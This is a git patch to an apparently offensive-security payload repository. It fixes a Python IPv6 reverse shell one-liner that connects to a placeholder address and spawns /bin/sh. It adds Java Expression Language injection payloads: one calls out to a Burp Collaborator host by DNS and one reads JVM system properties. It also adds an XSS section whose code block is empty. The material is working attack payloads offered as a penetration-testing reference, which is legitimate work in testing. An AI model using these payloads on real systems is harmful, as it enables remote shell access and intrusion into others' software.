From 9bde75b32d58f6f0e50330ae39b39e7739ec4aa4 Mon Sep 17 00:00:00 2001 From: Jeffrey Cap Date: Mon, 23 Aug 2021 14:41:40 -0500 Subject: [PATCH] Expression Language Injection One-Liners; XSS Payload; Fixed Linux Python IPv6 Reverse Shell Payload --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- Server Side Template Injection/README.md | 10 ++++++++++ XSS Injection/README.md | 6 ++++++ 3 files changed, 17 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 4dc4f2a..3b047c1 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty") IPv6 (No Spaces, Shortened) ```python -python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")' +python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' ``` Windows only diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 37772b7..75f2441 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -149,6 +149,16 @@ ${1+1} #{1+1} ``` +### Expression Language EL - One-Liner injections not including code execution + +```java +// DNS Lookup +${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net")} + +// JVM System Property Lookup (ex: java.class.path) +${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")} +``` + ### Expression Language EL - Code Execution diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 684adcd..6085179 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -230,6 +230,12 @@ e.g: 14.rs/#alert(document.domain) Use CTRL+SHIFT+X to trigger the onclick event ``` +### XSS when payload is reflected capitalized + +```javascript + +``` + ### DOM based XSS Based on a DOM XSS sink.